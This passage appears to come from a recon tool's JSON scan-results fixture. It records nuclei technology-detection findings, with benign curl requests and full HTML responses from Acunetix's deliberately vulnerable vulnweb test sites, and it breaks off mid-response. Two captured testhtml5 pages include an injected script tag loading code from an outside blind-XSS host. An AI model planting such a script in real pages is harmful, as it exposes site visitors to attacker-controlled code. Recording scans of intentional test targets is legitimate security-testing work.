Safari/537.36 Edg/123.0.0.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nContent-Length: 1233\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:34:33 GMT\r\nServer: Microsoft-IIS/8.5\r\nX-Powered-By: ASP.NET\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>\r\n<title>403 - Forbidden: Access is denied.</title>\r\n<style type="text/css">\r\n<!--\r\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\r\nfieldset{padding:0 15px 10px 15px;} \r\nh1{font-size:2.4em;margin:0;color:#FFF;}\r\nh2{font-size:1.7em;margin:0;color:#CC0000;} \r\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \r\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;\r\nbackground-color:#555555;}\r\n#content{margin:0 0 0 2%;position:relative;}\r\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\r\n-->\r\n</style>\r\n</head>\r\n<body>\r\n<div id="header"><h1>Server Error</h1></div>\r\n<div id="content">\r\n <div class="content-container"><fieldset>\r\n <h2>403 - Forbidden: Access is denied.</h2>\r\n <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>\r\n </fieldset></div>\r\n</div>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 84, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "angularjs", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' 'http://testhtml5.vulnweb.com/logout'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:41.794Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /logout HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nAccess-Control-Allow-Origin: *\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:37 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n\n <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">\n\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n\n <p class="navbar-text pull-right">\n \n <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>\n \n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Views</li>\n <li id="popularLi" class="active"><a href="#/popular">Popular</a></li>\n <li><a href="#/latest">Latest</a></li>\n <li><a href="#/carousel">Carousel</a></li>\n <li><a href="#/archive">Archive</a></li>\n\n <li class="nav-header">Website</li>\n <li><a href="#/about">About</a></li>\n <li><a href="#/contact">Contact</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n <div ng-view></div>\n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\n <div class="row-fluid">\n <div class="pull-left" style="font-size: xx-small;" id="refId"></div>\n </div>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p class="pull-left">&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n\n<!-- Modal -->\n<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">\n <form class="modal-body" action="/login" method="POST" id="loginForm">\n <div class="modal-header">\n <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>\n <h3 id="myModalLabel">Login</h3>\n </div>\n <div class="modal-body">\n <div class="control-group">\n <!-- Username -->\n <label class="control-label" for="username">Username</label>\n <div class="controls">\n <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">\n </div>\n </div>\n\n <div class="control-group">\n <!-- Password-->\n <label class="control-label" for="password">Password</label>\n <div class="controls">\n <input type="password" id="password" name="password" placeholder="" class="input-xlarge">\n </div>\n </div>\n\n <div class="control-group">\n <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>\n </div>\n\n </div>\n <div class="modal-footer">\n <button class="btn btn-primary" id="loginFormSubmit">Login</button>\n <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>\n </div>\n </form>\n</div>\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n\n<!-- App libs -->\n\n<script src="/static/app/app.js"></script>\n<script src="/static/app/libs/sessvars.js"></script>\n<script src="/static/app/post.js"></script>\n<script src="/static/app/controllers/controllers.js"></script>\n<script src="/static/app/services/itemsService.js"></script>\n<script src="http://bxss.s3.amazonaws.com/ad.js"></script>\n\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 85, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "angularjs", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0 OS/10.0.22631' 'http://testhtml5.vulnweb.com'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:41.867Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0 OS/10.0.22631\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nAccess-Control-Allow-Origin: *\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:36 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n\n <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">\n\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n\n <p class="navbar-text pull-right">\n \n <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>\n \n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Views</li>\n <li id="popularLi" class="active"><a href="#/popular">Popular</a></li>\n <li><a href="#/latest">Latest</a></li>\n <li><a href="#/carousel">Carousel</a></li>\n <li><a href="#/archive">Archive</a></li>\n\n <li class="nav-header">Website</li>\n <li><a href="#/about">About</a></li>\n <li><a href="#/contact">Contact</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n <div ng-view></div>\n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\n <div class="row-fluid">\n <div class="pull-left" style="font-size: xx-small;" id="refId"></div>\n </div>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p class="pull-left">&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n\n<!-- Modal -->\n<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">\n <form class="modal-body" action="/login" method="POST" id="loginForm">\n <div class="modal-header">\n <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>\n <h3 id="myModalLabel">Login</h3>\n </div>\n <div class="modal-body">\n <div class="control-group">\n <!-- Username -->\n <label class="control-label" for="username">Username</label>\n <div class="controls">\n <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">\n </div>\n </div>\n\n <div class="control-group">\n <!-- Password-->\n <label class="control-label" for="password">Password</label>\n <div class="controls">\n <input type="password" id="password" name="password" placeholder="" class="input-xlarge">\n </div>\n </div>\n\n <div class="control-group">\n <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>\n </div>\n\n </div>\n <div class="modal-footer">\n <button class="btn btn-primary" id="loginFormSubmit">Login</button>\n <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>\n </div>\n </form>\n</div>\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n\n<!-- App libs -->\n\n<script src="/static/app/app.js"></script>\n<script src="/static/app/libs/sessvars.js"></script>\n<script src="/static/app/post.js"></script>\n<script src="/static/app/controllers/controllers.js"></script>\n<script src="/static/app/services/itemsService.js"></script>\n<script src="http://bxss.s3.amazonaws.com/ad.js"></script>\n\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 86, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 76, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "microsoft-asp.net", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.6 Safari/605.1.15' 'http://testaspnet.vulnweb.com'", + "type": "http", + "http_url": "http://testaspnet.vulnweb.com", + "discovered_date": "2024-11-13T02:34:41.932Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testaspnet.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.6 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 14069\r\nCache-Control: private\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:32 GMT\r\nServer: Microsoft-IIS/8.5\r\nSet-Cookie: ASP.NET_SessionId=yqqlv5rvfxxko131fkruqp55; path=/; HttpOnly\r\nX-Aspnet-Version: 2.0.50727\r\nX-Powered-By: ASP.NET\r\n\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >\r\n<HTML>\r\n\t<HEAD>\r\n\t\t<title>acublog news</title>\r\n\t\t<META http-equiv="Content-Type" content="text/html; charset=windows-1252">\r\n\t\t<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">\r\n\t\t<meta content="C#" name="CODE_LANGUAGE">\r\n\t\t<meta content="JavaScript" name="vs_defaultClientScript">\r\n\t\t<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">\r\n\t\t<LINK href="styles.css" type="text/css" rel="stylesheet">\r\n\t</HEAD>\r\n\t<body>\r\n\t\t<form name="Form1" method="post" action="default.aspx" id="Form1">\r\n<div>\r\n<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />\r\n<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />\r\n<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />\r\n</div>\r\n\r\n<script type="text/javascript">\r\n//<![CDATA[\r\nvar theForm = document.forms['Form1'];\r\nif (!theForm) {\r\n theForm = document.Form1;\r\n}\r\nfunction __doPostBack(eventTarget, eventArgument) {\r\n if (!theForm.onsubmit || (theForm.onsubmit() != false)) {\r\n theForm.__EVENTTARGET.value = eventTarget;\r\n theForm.__EVENTARGUMENT.value = eventArgument;\r\n theForm.submit();\r\n }\r\n}\r\n//]]>\r\n</script>\r\n\r\n\r\n<div>\r\n\r\n\t<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />\r\n\t<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAKv3NmgDwKB48+iAgK20qX9DwK20qX9DwK20tmRBwK20tmRBwK20o35BQK20o35BQK20qGcDQK20qGcDQKL+bMFAov5swUCi/mn2AkCi/mn2AkCi/nb/AICi/nb/AICi/nPkwoCi/nPkwoCi/njtgMCi/njtgMCi/mXzQwCi/mXzQwCi/mL4AUCi/mL4AUCi/m/hw0Ci/m/hw0Ci/mT7AsCi/mT7AsCi/mHgwMCi/mHgwMCvJPzxAkCvJPzxAkCvJPnmwECvJPnmwECvJObvgoCvJObvgoCvJOP1QMCvJOP1QMCvJOj6AwCvJOj6AwCvJPXjAQCvJPXjAQCvJPLow0CvJPLow0CvJP/xgYCvJP/xgYCvJPTrwMCvJPTrwMCvJPHwgwCvJPHwgwCkbrR6w8CkbrR6w8CkbrFjgcCkbrFjgcCkbr5JQKRuvklApG67fgJApG67fgJApG6gZ8BApG6gZ8BApG6tbIKApG6tbIKApG6qckDApG6qckDApG63e0MApG63e0MApG6sdUJApG6sdUJApG6pegCApG6pegCAtTZ5J4HAtTZ5J4HAtTZmDUC1NmYNQLU2YzICQLU2YzICQLU2aDvAgLU2aDvAgLU2dSDCgLU2dSDCgLU2cimAwLU2cimAwLU2fz9DALU2fz9DALU2ZCQBALU2ZCQBBM7QfLxs46Xr8rthEeGdU4fr+Ig" />\r\n</div>\r\n\t\t\t\r\n<TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">\r\n\t<TR>\r\n\t\t<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>\r\n\t\t<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"\r\n\t\t\theight="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>\r\n\t</TR>\r\n</TABLE>\r\n<TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">\r\n\t<TR>\r\n\t\t<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>\r\n\t\t\t<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">\r\n\t\t\t\tsignup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>\r\n\t\t\t\t<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>\r\n\t\t</TD>\r\n\t\t<td class="MenuBar" align="right" width="50px">\r\n\t\t\t<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>\r\n\t\t</td>\r\n\t</TR>\r\n</TABLE>\r\n\r\n\t\t\t<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">\r\n\t\t\t\t<TR>\r\n\t\t\t\t\t<TD id="tdPageData" valign="top">\r\n\t\t\t\t\t<DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">(28) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">(28) comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">(29) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>\r\n\r\n\t\t\t\t\t<TD vAlign="top" width="200">\r\n\t\t\t\t\t\t<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">\r\n\t<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">\r\n\t\t<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V9040')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">November 2024</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V9101')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>\r\n\t</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9066')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9067')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9068')" style="color:Black" title="October 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9069')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9070')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9071')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9072')" style="color:Black" title="November 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9073')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9074')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9075')" style="color:Black" title="November 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9076')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9077')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9078')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9079')" style="color:Black" title="November 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9080')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9081')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9082')" style="color:Black" title="November 12">12</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9083')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9084')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9085')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9086')" style="color:Black" title="November 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9087')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9088')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9089')" style="color:Black" title="November 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9090')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9091')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9092')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9093')" style="color:Black" title="November 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9094')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9095')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9096')" style="color:Black" title="November 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9097')" style="color:Black" 